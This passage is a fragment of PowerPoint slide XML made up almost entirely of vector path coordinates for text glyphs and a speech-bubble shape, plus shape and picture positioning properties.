                    <a:pt x="536702" y="178473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529501" y="176034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521081" y="175221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512686" y="176034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486918" y="214668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486346" y="227431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486867" y="240042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488302" y="249897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488416" y="250698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521081" y="279768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529386" y="278980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536536" y="276606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542518" y="272656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546023" y="268643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547344" y="267131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551053" y="259892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553694" y="250863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555231" y="240436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555282" y="240042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555802" y="227571"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="584923" y="61709"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="584733" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584403" y="53975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582853" y="47180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580275" y="41325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577786" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576656" y="36423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572592" y="32042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572592" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529399" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529856" y="53975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529945" y="52920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532231" y="47955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540296" y="39966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545693" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559219" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564261" y="39789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570877" y="47053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572541" y="52197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572592" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572592" y="32042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571144" y="30480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563333" y="27495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553173" y="27495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519061" y="51130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516534" y="67691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517194" y="76504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547573" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547814" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556336" y="106692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561238" y="106692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565912" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574802" y="103644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579170" y="102146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583450" y="100342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583450" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583450" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582777" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580567" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576859" y="90500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566470" y="94615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561327" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552335" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548792" y="95084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542353" y="92913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539572" y="91313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537248" y="89141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534809" y="86956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532993" y="84251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530110" y="77241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529412" y="73202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529412" y="68580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584923" y="68580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584923" y="61709"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="646404" y="266128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="592353" y="266128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596823" y="262356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611873" y="249402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616839" y="244843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621652" y="240093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625017" y="236816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627875" y="233845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630224" y="231127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632599" y="228447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642150" y="206629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642099" y="194195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639216" y="187579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638340" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627519" y="177634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619455" y="175158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604164" y="175158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599020" y="175806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588352" y="178435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584085" y="179857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580898" y="181432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580898" y="195592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581583" y="195592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586117" y="192633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590778" y="190423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600227" y="187579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604735" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614984" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619772" y="188302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626656" y="194195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628383" y="198272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628383" y="209207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="601776" y="243370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578396" y="263575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578396" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646404" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646404" y="266128"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="669645" y="46901"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669404" y="46037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667715" y="40436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667600" y="40030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667512" y="39763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667359" y="39585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665937" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658977" y="29959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652767" y="27495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640168" y="27495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635825" y="28422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627380" y="32105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623290" y="34683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619315" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619315" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606653" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606653" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619315" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619315" y="48679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622795" y="46037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626414" y="43853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633958" y="40436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637590" y="39585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644410" y="39585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647166" y="40030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651395" y="41884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653021" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654126" y="45186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655205" y="46901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655955" y="49263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656767" y="55321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656971" y="58572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656971" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669645" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669645" y="46901"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="735812" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="709637" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709637" y="7950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696963" y="7950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696963" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688403" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688403" y="40259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696963" y="40259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696963" y="89433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698982" y="96075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706970" y="104343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712825" y="106413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722718" y="106413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725220" y="106210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730846" y="105397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733437" y="104889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735469" y="104343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735812" y="104343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735812" y="95288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735812" y="92849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735139" y="92849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734161" y="93256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732536" y="93776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728040" y="94970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725881" y="95288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720255" y="95288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718312" y="94970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717842" y="94970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709637" y="40259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735812" y="40259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735812" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="280035">
                  <a:moveTo>
                    <a:pt x="736854" y="266128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="682802" y="266128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687273" y="262356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702322" y="249402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707288" y="244843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712101" y="240093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715467" y="236816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718337" y="233845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720686" y="231127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723049" y="228447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732612" y="206629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732548" y="194195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729665" y="187579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728789" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717969" y="177634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709904" y="175158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694613" y="175158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689470" y="175806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678815" y="178435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674535" y="179857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671360" y="181432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671360" y="195592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672033" y="195592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676579" y="192633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681228" y="190423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690676" y="187579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695185" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705434" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710222" y="188302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717118" y="194195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718832" y="198272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718832" y="209207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692226" y="243370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668845" y="263575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668845" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736854" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736854" y="266128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B43E730C-C9F2-66C2-1B4E-7ECCB7BCEDDE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7152894" y="2410434"/>
              <a:ext cx="991869" cy="311150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="991870" h="311150">
                  <a:moveTo>
                    <a:pt x="991527" y="195160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973023" y="140030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="911580" y="88633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="867346" y="65671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815492" y="45262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757034" y="27940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693039" y="14236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624509" y="4686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490054" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429298" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374370" y="14668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326377" y="28079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286461" y="45224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235331" y="89496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226364" y="115976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229730" y="143738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240080" y="162458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130340" y="259461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318173" y="228663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350545" y="245452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402412" y="265861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460857" y="283184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524852" y="296900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593369" y="306438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662393" y="311124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727849" y="310819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788593" y="305828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843534" y="296468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891514" y="283057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931430" y="265899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982560" y="221640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991527" y="19516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5" name="object 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC2EE033-8597-4C43-43D5-221BAF22717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26307" y="1974046"/>
              <a:ext cx="252180" cy="88128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A9AC58A9-E3E5-DD23-E171-36E6A3A8839F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7718269" y="1895662"/>
              <a:ext cx="270510" cy="239395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="270509" h="239394">
                  <a:moveTo>
                    <a:pt x="0" y="238963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269950" y="190662"/>
                  </a:lnTo>
                </a:path>
                <a:path w="270509" h="239394">
                  <a:moveTo>
                    <a:pt x="0" y="48301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269950" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="270509" h="239394">
                  <a:moveTo>
                    <a:pt x="5077" y="45758"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5077" y="23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7" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37403609-52B2-4221-F05F-9D3988E0D68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52135" y="1608883"/>
              <a:ext cx="896296" cy="1065530"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C7DB1E82-63A3-B931-1F7D-30D710EC9243}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7265530" y="2726181"/>
              <a:ext cx="790575" cy="280035"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="89458" y="4521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70891" y="4521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44983" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24866" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18224" y="4521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12484" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12484" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40195" y="77266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48171" y="77266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56159" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76085" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76085" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89458" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89458" y="18402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89458" y="4521"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="175793" y="212051"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175742" y="201460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174764" y="196926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170586" y="189293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170065" y="188734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167627" y="186093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161912" y="182283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161912" y="204495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161912" y="210908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140119" y="228854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123469" y="228854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123469" y="188734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140906" y="188734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160083" y="198907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161302" y="201460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161912" y="204495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161912" y="182283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160553" y="181368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156845" y="179793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148488" y="177749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143395" y="177253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110096" y="177253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110096" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123469" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123469" y="240233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="240233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149961" y="239382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159423" y="235927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163512" y="233324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167970" y="228854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169748" y="227076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171932" y="223774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175031" y="216192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175793" y="212051"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="177469" y="48958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176720" y="44894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174256" y="39420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174142" y="39154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174053" y="38976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173761" y="38315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171602" y="35648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165887" y="31483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162471" y="29959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154609" y="28219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149987" y="27774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140131" y="27774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135013" y="28219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135267" y="28219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126174" y="29806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122605" y="30556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120129" y="31229"/>
